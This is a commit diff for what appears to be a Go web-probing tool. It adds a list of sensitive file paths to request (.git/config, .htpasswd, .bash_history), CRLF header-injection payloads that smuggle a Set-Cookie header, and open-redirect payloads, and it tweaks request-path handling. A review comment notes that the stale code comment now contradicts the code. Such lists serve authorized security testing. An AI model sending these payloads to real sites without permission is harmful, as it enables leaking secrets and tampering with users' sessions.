Adds lists, disables Opaque suffix
tomnomnom committed Aug 14, 2017
1 parent a6c451e commit 49b2c74
Showing 4 changed files with 75 additions and 48 deletions.
98 changes: 52 additions & 46 deletions lists/configfiles
@@ -1,60 +1,66 @@
/phpunix.xml
/php.php
/phpinfo.php
/phptest.php
/test.php
/README.mkd
/README.txt
/README.md
/README.html
/README
/readme.mkd
/readme.txt
/readme.md
/readme.html
/readme
/.babelrc
/.bash_history
/.bashrc
/build.xml
/Makefile
/circle.yml
/composer.json
/composer.lock
/CVS/Entries
/CVS/Root
/Dockerfile
/.dockerignore
/.editorconfig
/.git/config
/.git/HEAD
/.gitignore
/Gulpfile
/Gruntfile.js
/gruntfile.coffee
/Gruntfile.coffee
/gruntfile.js
/gruntfile.coffee
/phpunix.xml
/php.php
/phpinfo.php
/phptest.php
/test.php
/LICENSE
/LICENSE.md
/LICENSE.txt
/Gruntfile.js
/Gulpfile
/gulpfile.js
/Gulpfile.js
/.hg
/.htaccess
/.htpasswd
/Jenkinsfile
/.jestrc
/license
/LICENSE
/license.md
/LICENSE.md
/license.txt
/.bash_history
/.bashrc
/LICENSE.txt
/Makefile
/mkdocs.yml
/npm-debug.log
/.npmignore
/npm-shrinkwrap.json
/package.json
/phpinfo.php
/php.php
/phptest.php
/phpunit.xml
/.profile
/.git/config
/.git/HEAD
/.svn/entries
/readme
/README
/readme.html
/README.html
/readme.md
/README.md
/readme.mkd
/README.mkd
/readme.txt
/README.txt
/robots.txt
/webpack.config.js
/yarn.lock
/.travis.yml
/.svn/entries
/.swp
/tags
/test.php
/Thumbs.db
/npm-debug.log
/.travis.yml
/tsconfig.json
/webpack.config.js
/yarn-debug.log
/yarn-error.log
/npm-shrinkwrap.json
/Dockerfile
/tags
/.babelrc
/.npmignore
/.jestrc
/.hg
/.swp
/CVS/Root
/CVS/Entries
/yarn.lock
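--- a/lists/crlfinjection
+++ b/lists/crlfinjection
@@ -0,0 +1,9 @@
+/%0aSet-Cookie:crlf=injection
+/%250aSet-Cookie:crlf=injection
+/%25250aSet-Cookie:crlf=injection
+/%%0a0aSet-Cookie:crlf=injection
+/%3f%0dSet-Cookie:crlf=injection
+/%23%0dSet-Cookie:crlf=injection
+/%25%30aSet-Cookie:crlf=injection
+/%25%30%61Set-Cookie:crlf=injection
+/%u000aSet-Cookie:crlf=injection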
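--- a/lists/openredirects
+++ b/lists/openredirects
@@ -0,0 +1,12 @@
+/http://example.com
+/%5cexample.com
+/%2f%2fexample.com
+/http:/example.com
+/?url=http://example.com&next=http://example.com&redirect=http://example.com
+/?url=//example.com&next=//example.com&redirect=//example.com
+/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
+/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com
+/redirect?url=//example.com&next=//example.com&redirect=//example.com
+/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
+/.example.com
+///\;@example.com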
4 changes: 2 additions & 2 deletions req.go
@@ -23,7 +23,7 @@ var httpClient = &http.Client{

func httpRequest(method, prefix, suffix string) (response, error) {

req, err := http.NewRequest(method, prefix, nil)
req, err := http.NewRequest(method, prefix+suffix, nil)
if err != nil {
return response{}, err
}
@@ -32,7 +32,7 @@ func httpRequest(method, prefix, suffix string) (response, error) {
// Because we sometimes want to send some fairly dodgy paths,
// like /%%0a0afoo for example, we need to set the path on
// req.URL's Opaque field where it won't be parsed or encoded
req.URL.Opaque = suffix
//req.URL.Opaque = suffix

// It feels super nasty doing this, but some sites act differently
// when they don't recognise the user agent. E.g. some will just
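Review bot: The comment above the disabled `req.URL.Opaque` assignment is now stale: it still says the path is set on Opaque so that it is not parsed or encoded, but the code passes `prefix+suffix` to `http.NewRequest`, which parses the URL and returns an error for invalid percent-escapes such as the `/%%0a0afoo` example that comment gives. Suffixes of that shape, including `/%%0a0aSet-Cookie:crlf=injection` and `/%u000aSet-Cookie:crlf=injection` from lists/crlfinjection in this same commit, would presumably take the `return response{}, err` branch and never be requested; whether the caller reports that error is not visible here. I would delete the commented-out line rather than leave dead code, and replace the stale comment with one that records the new behaviour, e.g. `// suffix is parsed by http.NewRequest; malformed escapes return an error instead of being sent`. The body of httpRequest continues past the end of the second hunk.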
